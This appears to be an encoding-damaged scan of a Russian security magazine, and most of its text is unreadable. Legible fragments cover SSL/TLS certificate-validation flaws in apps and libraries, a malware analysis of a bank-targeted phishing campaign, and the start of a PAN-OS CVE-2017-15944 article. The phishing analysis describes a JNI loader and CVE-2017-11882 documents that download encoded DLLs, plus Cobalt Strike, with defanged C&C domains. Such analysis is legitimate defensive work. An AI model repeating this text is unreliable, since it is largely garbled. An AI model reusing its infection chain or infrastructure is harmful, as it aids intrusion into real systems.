? Apache� HttpClient� (???�??� 3.x),� Apache� Libcloud� ?� ???� ???�??�???� ???�???�
?????��??�????燗pache燗ctiveMQ��????�???
? SOAP爉iddleware????�???燡ava,��??�??�?燗pache燗xis,燗xis�燙odehaus
XFire?� ?� ???�?� ????� ????,� ???????� ??� ????� ????� middleware????�????� ????�
???�??
? API????�??�??�?燛lastic燣oad燘alancing?
? Weberknecht??????�????燱ebSockets????
? ?�??�?�???�?????�??�???,�??�??�????�?�???�??????�?????�???
???�?????� ?� middleware????�????� (???�?� ??????,� ???� ?????� middleware?
???�???,� ????�?� ????�?)?� ?� ???� ???�?� iOS????�??� ???�???????�??�???
Rackspace.
???�????爉iddleware????�???
???�????,� ?????� ???????�???� ???� ????�?� ???�?� ???�????� ??????�??� ????�
????�??.� ?� ??� ???�?:� Android?s� Google� Cloud� Messaging,� Angie?s� List� Business
Center燩asswords,燗T&T燝lobal燦etwork燙lient,燙apitalOne燬park燩ay,燙isco燨n?
Plus�(remote燼ccess),燙isco燭echnical燬upport,燙isco燱ebEx,燙isco燱ebEx燩ass?
words,� Dominos� Pizza,� E?Trade,� Freelancer,� Google� Earth,� Huntington� Mobile
(Bank),� Intuit� Tax� Online� Accountant,� iTunes� Connect,� Microsoft� Skype,� Oracle
Now,燩interest,燬afeNet�(VPN燾lient),燬outhWest燗irlines,燯ber,燯S燘ank�燗ccess
Online,燱estern燯nion,燱ordPress,燳ahoo!燜inance,燳ahoo!燤ail.
??�???�??�????�?�?�???�?�??�????�?????�??�??�???�??
??????????�?????????燬SL/TLS-?????????
SSL/TLS??????�????� ???�?� ???�?� ?� ???�???� ???�???� ???�?� ???�???
???�?????�?�???�??燤itM?????.�??�???燤itM????�?�??�?�??�??�?�?????�
???� ????� ???� ???�????� ???�?????�??� ?� ???� ??????�??� ???�??�??
???�??,� ??????�?� ???�???� ???�?????�?� ????� ???�?????�?.� MitM????�?
???�?� ???�??�?,� ????�?� ???�??�??�??� ???????�??� ???�????�?,� ???????� ????�
????�??�?��??�???�?�??�??�?燬SL/TLS????�?????�?�?�??�???�??�??�???�
??� ???�?.� ?� ??????�???� MitM????�???�?????� ?????,� ???�????,� ????????
??????� ????�???�??,� ??????� ???�??�??� ????,� ???�?,� ????�?� ?� ???�??� ?
?�?????�??�??�?,�??????�?????�???�??�????�??????�???�??�???�???�
??�??�????.
???�????�?� ??????�???� ???�?,� ???????� ?????� ??� ????�?� ?????????� Ad?
Mob� ???� ???�?� ???�?� ???�???�??� ?� AdMob?????�????,� ????� ???�???� ?� ???
???�???�?� ???�????�?� ???�???????� ????�??� ???�??� ?� ????????� ???�??
??�???�??燝oogle????�????.��??�???,�????�????�??�???�??�??�?�???�
??????�??� ?� ?????� ???�??�??�??,� ???� Trillian� ?� AIM,� MitM????�???�?????
?????�???????�???�??�??�??�??�??�?�?�???�??�????燝oogle�(????�??
Gmail),燳ahoo��??�?��??�????燱indows燣ive�(?�??�??�?燬kyDrive).�??�?
???�??� ???�????�??,� ??????�?� ????�???� ???�????�??� ???�?????�??
????????:� ??????�??????� ???�?????�??� ???????�??� ??????�??� ???� ?????�
?????�??�?�??�??�???�???�????�?????�????�??�??�?�??�??�???�?�???�
??????�??�??�??�??�??�???�??????�??�????�????�??�??�?.
??????�???????????????�?????????�?????????
SSL/TLS-?????????
??� ?� ?????�?� ??,� ????�?� ????????� ?� ???,� ???� ????� ????� ?� ?????�????
SSL/TLS????�???�?� ???� ???????�??� ???�??� (????,� ?????�?,� ??????� ?� ???
???� ?????),� ??� ??????� ???�?� ????�?,� ??�????� ???�??�??� ????,� ????�
?????� 0day????�??�??� ?� ?????� ?????,� ???� ???�????�?,� ???�??�?,� ???�????�
?????� ???�???,� ???�???� ?� ???�??�?,� ????�??�???�????� BGP????�??�????�
???� ????� ???�????� SSL/TLS� ??� ????�??�??� ?/???� ????�??�???� ????????
???????.
???�?�?燬SL�?�???�??�??�???????�??????
???�?�???,�??�???�????�?�????�????�???�???�????�?�?????�??燤itM?
???�?,� ???�???�?????� ???????�??� ??????�????� SSL/TLS?????�??,� ??????�
?????�??� ?� ????�?� SSLSessionCache.� ????� ????????� ???�???�?� ???�?????�
?????�??�?????�??�???�?�??�??�???????�??�????�????,��??�???�???�
???????� ???�???� ????�??� ????�???�???� ?????� ???�?� ???�?� ???�????� ????�
??????�??��?????�???.�??�?�???,�??�?�??????�????燗ndroid???????�???
(?????� ?????� �?????�???粻 ???� �????�???� ???????�)� ???�?� ???�??�???
??????� ?????�????�??� ???�??� ???�?� ???�???�??,� ???????� ???�?� ????????�
?????�?�????�?????,�?�?�??????�????�?????�?.�??,�??�????,�??�????�
???� ?� Google� Maps.� ?� ???�??�????� ?� Black� Hat� ???�???,� ???� ???�???�?� ????
??????�??� ??????�????� ???�???�?????� ?????� ?????�????� ????�????
???�???�?????�?�???�??�?????��??�???牜??????�??�??�?????�?粻?�????
????�??�?????�??????�????�????��????�??�???�???.
???�?????�???�??�?????�??�??????
???�?�??�??�??�??????�??�??�??�????�??�????�????燬SL/TLS????�????�
??� ???�?� ????�???� ???�????� ???�??????� (??.� ???�??�????� ?� Black� Hat
??� 2016� ???),� ???�?????� ??????�??????� GCM� (Galois/Counter� Mode?� ????�??
?�????�?????�???�????)�(????????��??�???�??�??????�燘lack燞at,�???
??� 2016� ???),�??�????�燙NG�(CryptoAPI?NG)� ?燬channel,� ??�??�??�???� ????�
???�?�????�?�??????,�?�??�??�???�??�??�?�??�?�??�?.
???�????�燙NG:�?????�???�??�???�?燬channel
??�??�??�???�??�??�?�????�?�??????�???�???�???�????�???�???,�???�
??�??????�???�??�??�???�?�???�??�?�????�??�??????,��??????�???�
????�??�??�???�??�??�?,�?�??�????�??�???,�????�??�???�??�??????�
???�?�??�??�????.�??�??�???�?�????�???????��????�???????�?????
?/???� ??????� ???�??�??� ????.� ?� ?� ??????�??� ???�???� ????� ??????� ???�????
???�????�???�???.
?燗ndroid?????�??�??�??�??????�??�???�?,�??�????,�??�?�??�???�?
???�?????�????�??� X509TrustManager??????????,� ???????� ????�???�?
?????�????燙erti?cateException.�??�??�?�??�????�??�??�?�????�???��??
WebViews????�????�?�????�?????燬slErrorHandler.proceed().
??????�??燬SL/TLS
????�??�??�???�????�????�?�???�???�??�??????�?????�??�????�??�
????�??� API???????� SSL/TLS????�?????� (?� ???� ???�?� JSSE,� OpenSSL
?燝nuTLS).��???�?��?�????�???�??�?????�??�?????�?????�?�??�??
(?????� ???� cURL,� Apache� HttpClient� ?� urllib),� ???�??� ??� ???????� ????�???�???
?????� ??????�???�????� ????�??� ???� SSL/TLS????�?????.� ??� ??????� ???
?� middleware????�????� (?????� ???� Apache� Axis,� Axis� 2� ???� Codehaus� XFire),
???� ?????� ??????�???�????� ????�???,� ???????� ???�???�???� �???�??� ???�
????�???�????�?.
????�?�???�??�?�??�?��???�?????�??�????�????�(?????�??�??????
??�??�????�?�???�????�???�??)�?????�?�????�??�??�??�?�(?�??�????
???�????�????�??�?� ?� ?????�?????�??),� ???�??�???�??� ??� ???�?????�????
???�?????�??� ?????�????� SSL/TLS????�???�?,� ???� API� ??????�???
??�?????�?�???�??�?????�????燬SL/TLS????????�??,�??????�??�??.�???�
????�?�?????�???�?????�??�?,�??�?�?�??�???�?�??�?????�??�??????�
?????� ?????,� ?????�???�??� ???�???� ???�??�?� ???�?� ???�?� ?� ???????�?
??�????�??�????�??�??�?????�??�?????�?????�??�???�??�??�????.
?� ??????�???� ????�?????� ???�????�???� ??????�???� SSL/TLS� API� ????�
??????�?:� ???�??�?� ?????�??�???�?� ???�???�????� ??� ???????�??,� ?????,
?????�??�???????��??�??�?????�??�????.�??�????:
? Amazon???????� PHP????�????�?� Flexible� Payments� Service� ????�???� ?????�
????� ???�??�?� ???�?� ???�?� ???�???�???� ????�??�?� ???????�?� CURLOP?
T_SSL_VERIFYHOST� ?� ???�????� TRUE� (?� cURL????�????�?).� ????�?� ????�
???�???�??�????�?�???�????�??�??�?�??????�?���???�?�????�
?????� ???� ???�????� TRUE,� ??� ???�?� ???????�?� ???????�?� ???� ???�?????�
????� ????�??????�?� ???�????� 1,� ?� ?????� ????�??� ???�??�?� ???�?????�?
?????�???�??
? PHP????�????�?燩ayPal燩ayments燬tandard�??�???�?�?�?�????�???�??
???�??� ?� ???� ??????,� ???�?� ???�???�??,� ???�????� ?????�????� ????????�
????�(??�???�???�???�?�???�?,�??�??�?????�?)?
? ???�??�??�??��??燣ynx,�??�??�????�??????�??�??�???.�?�??�????�
??� ???????�????�??� ???�?????�?,� ??� ????�?� ?� ???� ???�??,� ????� GnuTL?
S????� ???�???� ???�??�?� ???�?????�?� ???�??�???� ????�?????�??� ????�
?????.� ????�?� ???� ?????� ???�???� ???� ??????�??� ???�??� ???�??�???� 0?
?� ???� ???�?� ?� ???� ???�???,� ???�?� ???�?????�?� ???�?????� ??????�??�??
????�??.� ?????� ???�?� ?????�?� ???�??�?� ???????� ?� Lynx� ???�???�???
??????�?.
???�?� ????,� ????�?????� ???�????�???� ?????�??� ???�?????�?� ??????�?,
?????� ????�?� ?????�??� ???????�????� ???�??�????�?� ??� ???� ????� SSL/TLS?
???�????�?.�????�?��????�??�???�??�?�????�???�??�????�??�??�??,
???�?� ?� ???�???�???,� ????�???�??�?� ???�?????�?� ?� ???????�??� ????�
??????�???� (???�????,� ???�??�??�???�???� ?� ???�??�??� ???�??�????),
??????�???�?� SSL/TLS????�????�?,� ???????� ??� ???�???�?� SSL/TLS?????�
??????�?�???�?.�????�??�???�??,�?�??�????�???�????�??�??�??�
???� ???�?� ???�????�??� ?????????????� ??� ???�???�??�??� ???�?� ???�?� ???�?
?????�???� ???�???�?� ???�??�?� SSL/TLS????�?????�??� (??� ?????� ???�???
???,� ???�????,� ???� ???�?????�??� ???�???,� ?� ???�?� ???�?????�??� ?� ??????
?????� ????�???� ??).� ???� ????� ??????�???�????� ????�??�???� ???,� ???????�
??????� ????� ???�???�??�??� ????,� ???�??,� ???� ???�??�?� ???�?????�??� ????�
????�??�?.� ?????� ????�??,� ????�?� SSL/TLS� ???�?� ????�?� ????�?� ?� ???�???
????�?� ???� ???�?� ???�???�??� ???�???�??�??� ???�?????�?????� ?� ?????� ????
????�?????�??�??�???�???�??�????�?�???�????�?�????�????.
???�????,�燡SSE�(Java燬ecure燬ocket燛xtension)�??�????�??�????????
SSLSocketFactory� API� ???�?� ???�??�???� ???�??�?� ???�?� ???�?,� ????� ????� al?
gorithm�燬SL????�???�???�??�???�燦ULL�??��??�??�???�?,��?�燞TTPS.
????� ???�??� ?????�????�???� ???�???�???� ?� ????�??�??� ????????�??� JSSE,
???�??� Java??????�????� SSL????�???�??� ??????�???� SSLSocketFactory
???�????�????�??�??�?�??�?�??�??
?????�???��????�????
??�???�???�?????�???,�??��???????�??�?�??�????�???�??�?????�???
???????�?� ???�??�?� SSL/TLS????�?????�??� ????� ?????�???� ???�??,� ????
?????�???�?�??�?????�?.�?�????�???�???�???�???�???�?????�??�????�
???�??�??�????�??燬SL/TLS????�???�?.�?????�??�?�???�??�????�??�(??
??�??)�???�??�???�/???�??�???�?�???.�???�?????�?��??�???�???,
??�?�??�??�???�??�????�???�??�?,�??????�?????�??,�??????�?????
?�??�???�????.
????�?????�??�???�??�??�??燬SL/TLS�??�????�??
???�?� ????????� ???�?� ????� ?� ???�?� ???�?,� ???�?� ????�???,� ???� ?� ???�??�??
????�??????�?�??�????,�????�?,�??????�?��??�??�?�??�???�(??�????�
???� ??� RFC),� ???� SSL� ???�??� ?????�???�???�?.� ???�???� ???�????,� ???????
????�?�??�????�?�??�??��??????�??�?�????�??,�?�?�????�???.�???�
??� ????�?� ???�???�?� ?????� ???�??????�??�??� SSL????�????�?,� ?� ?????�
??????�???� ??� ????�?� ???�??�???�????� (???�?????�????/??????�????�
?????).�??��???�????�?��??????�???�???�??�???��???�?????.�???�
?????�??�???�??�????�?�??�???�??�??�??�??,��??�???�???�????�???�
???�?� ????�??�??�?� ????� ?� ???�???�?� ???�??.� ???� ???� ????� ?????� ?� ???????
?� ???�??�??� ???� ???�?????� ???????� ???�???� ?????� ?????�????� SSL/TLS?
????�???�?,� ???????� ???�??� ?????�???�?� ??� ???????�?� �?????� ???� ???�?,
?�?????�???�??�???�?�,�?�?�???�?��??�??�??�??�??�?�?????.
????????????
1.燤artin燝eorgiev,燫ishita燗nubhai,燬ubodh營yengar.燭he燤ost燚angerous燙ode
in爐he燱orld:燰alidating燬SL燙erti?cates爄n燦on?Browser燬oftware�//燩roceed?
ings� of� the� 2012� ACM� conference� on� computer� and� communications� security.
2012.燩.�?49.
2.燭ony燭rummer.燤obile燬SL燜ailures�//燩roceedings爋f爐he燞ITB燬ecurity燙onfer?
ence.�15.
3.燢ellen� Evan� Person.� How� Ciphersuites� Work:� TLS� in� Pieces� //� 2017.� URL:
https://?y.io/articles/how?ciphersuites?work/� (????� ????�????:� 15� ????�
????�18).
4.燙atalin� Cimpanu.� Extended� Validation� (EV)� Certi?cates� Abused� to� Create� In?
sanely� Believable� Phishing� Sites� //� BleepingComputer.� 2017.� URL:
https://www.bleepingcomputer.com/news/security/extended?validation?ev?
certi?cates?abused?to?create?insanely?believable?phishing?sites/� (????� ?????�
?????:��??�???�18).
5.燚avid燗drian.燗燫etrospective爋n爐he燯se爋f燛xport燙ryptography�//燘lack燞at.
2016.
6.燬ean� Devlin.� Nonce?Disrespecting� Adversaries:� Practical� Forgery� Attacks
on燝CM爄n燭LS�//燘lack燞at.�16.
7.燡ake燢ambic.燙unning爓ith燙NG:燬oliciting燬ecrets爁rom燬channel�//燘lack燞at.
2016.
8.燰aleria燘ertacco.燭orturing燨penSSL�//燘lack燞at.�12.
9.燭om爒an燝oethem.燞EIST:燞TTP燛ncrypted營nformation燙an燘e燬tolen燭hrough
TCP?Windows�//燘lack燞at.�16.
10.燗rtyom燝avrichenkov.燘reaking燞ttps燱ith燘GP燞ijacking�//燘lack燞at.�16.
11.燙hris燬tone,燭om燙hothia.燬pinner:燬emi?Automatic燚etection爋f燩inning爓ith?
out燞ostname燰eri?cation�//燩roceedings爋f爐he燗nnual燙omputer燬ecurity燗p?
plications燙onference�(ACSAC)�17.
12.燤arco燨rtisi.燫ecover燼燫SA燩rivate燢ey爁rom燼燭LS燬ession爓ith燩erfect燜or?
ward燬ecrecy�//燘lack燞at.�16.
?????? ????????
??�?�???�???�??�????�?�??�???�?�????�??:
1.燬SL� ??????�???�?� ?� ?????�??� ???�?????�?� ???� web?????�
?????,� ???�???�???� ???�???�??� HTTP(S)????�???�?.
???� ?????� ???�?,� ??� ???� ??????,� ???� ???,� ??� ????,� ????�?
????
???�???????� ???�????�??� ??????�?� ???�??� ?� ???????
????????
SSL� ???�???�?� ???� ??� ???�??�?� ???????,� ?� ???�???
??????????��????�?��??�???�??燱i?Fi�(???�????,�??�?�??�???�???�
?????� ???�?� ???�???� ?� ?????�???????� ??????� ??� VK,� ???�?� ?� ???�??
?�????�??�???,�???�?�?????�????�?�???�?燞TTP).
2.�� ???�??� ?????�??:� SSL� ???� ???�?� ??� ???????,� ???�???�?� ???�??� ?????
????� ?????�?????� ?????� ???�???� ???�?????� ???�?????�?� ?� ?????�????
???�?� �??????� ??????�???�,� ?� ????� ??� ???� ????� ????� ??????� ?� ???�?� �??�
???�??� ?� ???�?????�?� HTTPS????�???�.� ???�?� ????,� ?� 2014� ????� ????�
??????�???� ???� ????�???� ??� ???�????�?� ?� ???????� ???�??� ???�???�?.
SSL�??�??�???�????�??�?�?????��???�?燭LS�(??.燙VE?2014?3566).
3.�� ???�?� ?� ???????� ?????�??:� ???� ???� ???�??�?� ?� ????�?????�??� ????�
???????� ?� ???� ??????� ????�??�?� ???�?� ?� ???�??�?,� ???�?� ???� ????�
???????� ???�??� ??????�???�?� ????�????� ????.� ??� ????� ????� ?� ??� ?????�
?????�?�??�?????.�??�????�?�??�???�???�???�???�??�??!
?????
????�????????
@YuryDo
yurydo@gmail.com
?????�??????
AVOreshkin@sberbank.ru
][-????????:
??????? ?????
??�???????
??????????�??????????�??
�?????????�??????????�
??�???�?� ????�??�??� ??� ???� ?� ???????� ???�???�???
?� ??????,� ???????� ???�?� ??????� ?????�???,� ???�???�????
????�??� ?????�????� ???�??�???�?,� ?� ???� ??� ????� ???????.
?????�?� ??� ????�??�???� ?� ????�?� ??????�??� ??� ???�????
?????�?????� ???�???� ???�??,� ?� ???� ???�?� ?� ????�???.
??� ???�??� ??????,� ???� ????� ???�??�??� ?????�????� ????�
?????�?�???�?�??�??�???�??�????�??.�?�?????�??�???�
???� ?� ???�??� ?????�?� ???�???�?� ???�???�??�?????
???????�?????�??�??�?.
??????????
???�??�???�???�???�????�????�??�???�??�????�??????�??�???:
? ???� ???�????� ???�???�?????� ?� ???�??� ??????�?� ???� (???????� ????
UTC+3)?
? ???�??�??�?��??�?????�?????�????�?�17�????
? ???�??�??�?��??�??�??????�?????�18�????
? ??????�??�?��?????�??????�?????�18�???.
??�??�????� ????�?� ???�???????� ?� ???�????�?????� ??� ???�???�?� ????
??�??�????�??�??�????�??�????�??�????.�??�??�??�?�??�????�?????
?????� ???????� ?????�??� ????,� ????????�??� ???�?????� ??????????�????,
???????�?� ??????�???�???� ???�??�??�???�?.� ???� ???????�??�????�??
?????�??�??�?�??�?�????�??��????�???�??�???�??�????,��??????�
??�??�??�??�???�?�??�??�???�????�????�???�???�??.
??�???�?�??�??�???�??�??????:
? ????�?�??�????�??�?????��??�?????�%?
? ???�???�?�???�??�??�?�?????�?�?�??�???�??�??
? ??�????�?� ?� ???�??�??�?,� ??????�????�????� ?� ???�??,� ???�?� ????�
????????�??�??�?????
? ???� ????�?� ???�?� ????�?????� ?????�???� ?� ????� ??????�???� ?� ???????
???�?????�??�???燛xim�80?
? ??�???�???????� ???�?????�?,� ???????�??� ????�?????�??�?� ???�??�?
Comodo� CA� Ltd.,� Digicert,� Inc.� ???�??�??� ?� ???�?????�??� ???�????,
???????�??�???�?????:燚azzle燬olutions燣td.,燘right營dea燛nterprise燣td.?
? ??�???�???????�??�??�???�??�??????�????�??�????�???�?:�???�?
?�???�?,�??????�?�??????�???爅ar??????�??�??�??�???,�??�??�???�
??????�???�??????�??�??�??????燙VE?2017?11882.
???�?�??�??????�?,�??�??�?�?�??�???.�????�??�?????�??�?�?�?????�
????� ???�??�??????� ???�???�????�??� ?� ??????????�???,� ?� ???�??�??�?
?�??????�?�??????�?????�??�??�????�?�????�??�?????�??.
???????�???.�?????�????
???�????�????�??�???�?????��??????:
? billing?cbr[.]ru
? bankosantantder[.]com
? oracle?russia[.]info
? cards?nspk[.]ru
? regdommain[.]com
??�??�??� ???�?� ?????�??�???�???� ???????�?� ??� ???�???�??� ????.� ????
????�??�???� ???�???�?� ????????� ???????� ???�????� ????�?� ?????�???�?
????�?.� ???�??� ?????�???� ?????� ???????,� ???� ???� ????�?� ????� ??????�???
?�??????�??�?????�??�???燛xim�80.
??�???�??�???�?�????�?????�???�?
?????�???�????�????�????�爐ext/html,�??????�?�爍uoted?printable燯TF?
8.
??�????�?,�??�???�???�????�???�????�?????�???�?
???????�????.�?????�???�????��??????????燯RL
???� ????�?,� ???�??�??� ?� ????�??,� ????� ??� ????�???,� ?� HTML?????� ???????
???�????�???�?????�??�????�??�????�???燡ava??????�?爏igned.jar.�?????
???�?,� ????�???� ?????�???� ??????�????�??� ?� Base64� ????�????� ????????�
???�?� ????,� ????�????�??�???� ???� ???�???�??� ???�????�???� ??.� ???�??
???�??�????�????�??�?�??�?????�???�燡ava??????�?.
Base64爀ncoded�???�???,�???�????�??�??�??�??�???�??�??�????�
????燡ava??????�?
???�????�?,�??�?�??�??�?????�???�?�???�?,�????�????爏igned.jar.�???�
????�?爅ar?????�??�????�??�???�???�??�??�?????�??,�????�??燙omodo
CA� Ltd.� /� Digicert,� Inc.,� ??� ???�????� ???�??�?� ???�??�?� ???????�????� Java?
??????.� ???�?� ????�???,� ???� ???� ??????�??????� ???????�??� Java� ??� ?????�
?????� ???� ?????�?� ?????�?� ???�???�?� ???�??????�??� ????�?????�?.� ??????�
???� ????�??� ???�??� ???�?????� ??????� ?????�??� ?� ???�???�???�??�??
??????� ?� ?????�???� ?????� Allow� user� to� grant� permissions� to� signed� content
?�??�???�??燡ava.
??�??�????�??�????�???爅ar????�?
??�??�??�??????�??�??????
????????????�?????????燤AIN.DLL/MAIN64.DLL
???�????�??�?�???�??�?????�?��??�???�???�??????�??燡ava燦ative
Interface� (JNI),� ???�???�???� ???�???�????� ?????� ?????�???� ????� ??� Java?
??????� ?� ?????�??.� ??� ???�?� ???????�??� jar??????�?� ????�???�???� ????�
????????�?��??�???�???�????�???�?�???�??????�?????�??�??燚LL?
???�????�?:
? main.dll�??�?�????�???燱indows�??�?????�?�86?
? main64.dll�??�?�????�???燱indows�??�?????�?爔64.
??�??爅ava_main_inject�爏igned.jar
???�?� ?????�????� main.dll/main64.dll� ???�???�???� ??� ????� ?� ?????�???�?
??� ???????�??� ?� ???????� ???�???� System.load()� ?� ???�??�??� ???�????�??
??????� Java.� ???� ??� main.dll/main64.dll� ??????�??�?� ??????�?� ????�?� ????�
????� Windows� API� ???� ??????� ?� HTTP????�???�??� ??� ???�????�?� wininet.dll,
????�???�?� ?� URL� hxxps://servicenetupdate[.]com/yroyiuymsa,� ???�???�?
?� ???�????�???�?� ???�??????�??� ??� ???�?� ????�?� ????� int.dll� (???� ????�
??????�?� ??????�????�?� ????�???� XOR� ?� ????????� ??????),� ???�?� ????
???????�??�?????�???�??�????�??�???�???.
main.dll��??�?????�??燞TTP????�???�??�?????�??�??�????�?
???????
???????�????.�?????�???�????��??????????
????????�???????
???�????�??� ??� ???�??????�?????� ?????� ???�????� ???�????,� ?� ??????�??
???�???� ???�??� URL� ??� RTF?????� hxxp://oracle?russia.info/Oracle_RDBMS.rtf
(3??�??�?).
??�?�???�????�???,��???�??????�??????�??�?�???,�??�???��???�
???�??�??� ?????�???� ?� ????�?� 2017� ????� ???�????�?� ?� ??????� ?????�???
???�??� (CVE?2017?11882).� ????????�?� ???�?????� ???�????�???� ??� ?� ????
scr????�?,� ?????�????�?� .NET???????,� ???????� ???�????� PowerShell?????�
?????.
?� ????� ??????�???� ???�???� scr????�?� ????� ????�??�???,� ???� ???� ??????�
?????�????�?????��??????�?????�???�???�??�?燲OR��??�????�???�
???�?5.
???�????�??燩owerShell????�????�??�?�??�??�?????�???燲OR��??�
???�A5
????�???��??�???燘ase64,�?????�???�??�??,�??�?�????????�??�
???
??�??�??�??,�????�??�??�?燘ase64?????�????,�???�??�??
??�?????�??�??�????�?�??????
???�?� ???????�??� PowerShell????�????� ???�???????� SSL??????�????
?� ?????� hxxps://teredo?update.com� (3??� ???�?)� ?� ?????� ???�????�?� ???�?????
???????爄nt.dll.
???????�????.�?????�???�????��????????�??????
????� int.dll,� ??????�???� ?� ??????�???� ???� ???�???,� ???� ?� ???�???� ???�????
???�?,� ?� ???� ???????�???� ????� Windows� PE32� (DLL),� ????�????�??�??
???� ???�????� ???�??� ???????� ???�????�???� ??� ?� ???�???� ???????�??.
?�????�??�???�?�??�???�??????�??�?�??�?�??�??�??�?�?????�?????�
??� URL� hxxps://help?desc?me[.]com/<????�????�??�??� ????�?� ??� ASCII?????�
?????��??�??�????�??>/.
?�???�???�?????��???�????�?�??�?????�??????�???�??�?��??�???
???????�??�?�??�???�?燞TTP�??�???�???燝ET????�????.��??�??�??????�
???燞TTP?????�?��????�0�??�???????�????�????�??�?????��?????�
??????�???.� ???�?� ???�?� ???�?????� ?????�??� ??� ?� ???�??�??� ???�??� ???�???�
??� ?� ???� ????�?� ???�??????�??�??� ?????� ???�??????� ?????�?????�??� ????�
?????�???�?.�?????�???�?????�??????�?????�?????�?�??�??�???????�
???��??????�?????燞TTP燩OST.
???�?????� ??????�????� ???�????�?� ???�?????�??� ???�??� ???�??????� ?
?????�??� ???�??,� ?????�?????� ???�???�???� ??????,� ????� ????�???�???
?�??�???爃uman爎eadable燾ontent.
Human爎eadable�???�????,�????�?????�????�?????�??�?????�??�
?????�???�?
?????�???�??�????�?,�???�?????�?�?????�???�??�?????�???�??�
?????
?� ????� ??????�??�???� ???�???� ??� ???�???�??� ???�???�??� ????� ???�???
????????�??�??�???�???�?????:
? ??�????�???� ????� ???�???� Windows� PE� (DLL)� ?� ??????� ???� ???�????
?????�????,�??�???�???�??�??�??,�??�?��??????�??�?�??�???�???�
????�?�?????�??�???�????�???
? ??�????�???� ????� ???�???� Windows� PE� (DLL)� ?� ??????� ???� ??????�??
????�?�??????�??�??�??�??�(???�?�??????�???�??�??��???��??).
???�?�????�????�?????�???�??�??�??????�?�??????�???�??�???
? ??�??�??� ???�????� Cobalt� Strike� Beacon� ???�??� 3.8,� ??????�???� ????�?
?� ???�??� ???�???�?� ??????�?� ??????�???�???� ???????� ??� ????�?
???????�??�??????�??��??????�??�??�???.
???�?????�??�????�???�???�?
???�?????�??�???�?�??????�??�??�??�??
???�?�????�??�????�??燯RL��???�?,�??????�?�??????�???爅ar?
????
?????�????�????
?�?????�???�??�???�???�??�???�????�??�?�???.
???�?�????�??�??�??�???,�??�??�??�?????�??�??????燙VE?2017?
11882
???�???� C&C� ? � 1� ??????�???????� ??????�?� ???� ???�??????� ???�????�?
???????,�??�???�??�?��?????�??�???�??�?�??�?.燙&C���????�??
???????�???� ???�???� ???� ???�??�???� ???�??�??�????.� ???�?� ???� ???????�
????????� ???� ??????�?� ?????�?????�??� ???????,� ????�????�??�????
???�???�????�?�????�????�???�??�??????�????��???�??�??.
???�??燙&C????�????:
? servicenetupdate[.]com
? bankosantantder[.]com
? oracle?russia[.]info
? help?desc?me[.]com
? billing?cbr[.]ru
? teredo?update[.]com
? techupdateslive[.]com
? getfreshnews[.]com
?????????�?�???�?????????�?????????�???
???�??��??�??�??�?:
? Main.class��???�????�??�???�?�???�???�燘ase64?
? main.dll��???�??�???�?????�?????
? int.dll��?????�?�????�??�??�????��???�?????�?????
? ??�???�?� ???�??� ???�??� ???�??????�????� ?????� RTF?????� (CVE?2017?
11882).
???�??��?????�??�?:
? int.dll��?????�?�????�??�??�????��???�?????�?????
? ?�???�????�?????�???�?�????�???�??�??�???�?�?爏cr?????.
??????????
???� ?????�??� ?????�???�??� ?????�????� ???�??�??� ?????�??� ???�???
??????,�??�??�??�????�??�????�??�?�????�???�?��??�?????�??�???
???�???.�???�?�???�?�????�??????�????�??�??�???�??�??�??�??�???�
??,� ???�???�???� ???�?????� ??????�??� ???�??� ??????�??� ?� ???�???�??.
?� ???�??� Security� Operation� Center� ??????�?� ?????�?� Threat� Intelligence,
Forensics� ?� RedTeam.� ????�?� SOC� ????�???�???�?� ????�???�?� ???�??�????�
???,� ???????�??� ???�???�?� ???�??�??�????� ?� ????�???�????????�??�???,
??????� ???� Bizone� ?� ???�????.� ?� ???� ???�???� ???� ??� ???� ??????�?� ????
????????�????.
?� ???�?� ????�???� ????� ??� ???�?� ???�???�???� ??????� ??????� ???�?� ????
??� ?????�????� ????�???�??� ???�??.� ????�?� ???�???,� ???� ???????�??� ????
???�?� ???�???�???,� ??� ???�?� ????????�?� ????�???,� ???� ??� ???�????�??� ????�
????� ???�??� ?� ???�???�???� ???�????�?� ?� ????�??�??� ???�?� ???�???�???
??� ?????�????� ??????�?.� ??????� ???�?,� ?????�????� ???�????� ???� ????
???�?� ????�???� ???????�?????�??� ?� ???�???�?� ???�????�?????� ???�????,
?� ??� ??????� ???�??�??� ?� ?????�???� ???????� ???�???�????�??� ???�????
????????�??� ???�??�??�?� ?� ??????�?.� ???�????�??� ?????� ???�?????�??
???�???�?� ???�???�????� ??????�??� ???�??� ???�????�???� ????� ?� ???�????�
????�??????�??�????�???��?????�??�???�??�???,��??�?�??�???�??�?
???�???� ?� ????�????� ?????� ???�???� ???????.� ???� ???�????�?????� ?????�?
??� ????�????�?,� ??� ?� ????� ???�?� ????� ???�????�?????� ?� ???� ??,� ?� ????� ??
????�??�?��???�???�????�?�????�??�??.�
?????
?????
???????
??????�??????????????
???????????�?????????
?�?燩ALO燗LTO燦ETWORKS
aLLy
ONsec
@iamsecurity
Palo燗lto燦etworks��???�?�???�??�??�???�??�?????�???�
?????.� ???�??�?� ????� ???�????� ??????�?� ??� ????�???�??
??� ?� ???�????� ???�??�?� ???� ???�???�?� PAN?OS.� ?� ??????
?????�?� ?� ???�?� ???�????�?,� ???????� ???�????� ?� ???�???�
????� ???????�??� ????� ??� ???�?� ?????�???�?????�?
???�?????????�???�???�??.�?????�?????,�??�????�????�
?????�?????�???�?�??�???�???�??�????�??�????�?!
???�?�???�??�???�??�??�????�?��????�????�???????????�?�???????�
???�???�??�???�???�??�???�?.�????�?�?�??�??�???�?�????�???�???�
??????�??� ???� ??� ???�?� ?????�???�?????�?� ?� ????�??�???�?????� ???� ????�
????.�??�?????�?�???�???�?????�??� CVE?2017?15944.� ?????� ???�?????
??�??�??�???.
???�??�?????�??�????�??�????�?�???�??�??�??�???:
? PAN?OS�1.18��???,
? PAN?OS�0.18��???,
? PAN?OS�1.13��???,
? PAN?OS�0.5��???.
??,� ???�???� ???�?� ???� ????�??�??� ???�?,� ??� ???� ????� ????� ?� ????�?� ???
??????�???�?�?�??�??,�?????�??燩AN?OS�??�????�???�???�?��??�???�?
?� ???�????�?� ????�??�???� ???�??�???.� ????� ?� ????� ???????�?� ?????
???�????,�?�?,�????�?�?,�?????�????�?�?�??�????�??�???��??�??
???�????� ?� ???�???� ???�??� ???�??�?.� ????� ?????� ???�?????�?� ???,� ??,� ???,
???�???� ?????� ??� ???????�?� ?� ???�??�?� ???�?????� ??� ?????� ???�??�??�??
?�?????.�???�??�???�??�???�??�??,�?�?????�???�???.�)
????�???�???�???�??��?????�??????�??燩AN?OS
?????�??????????
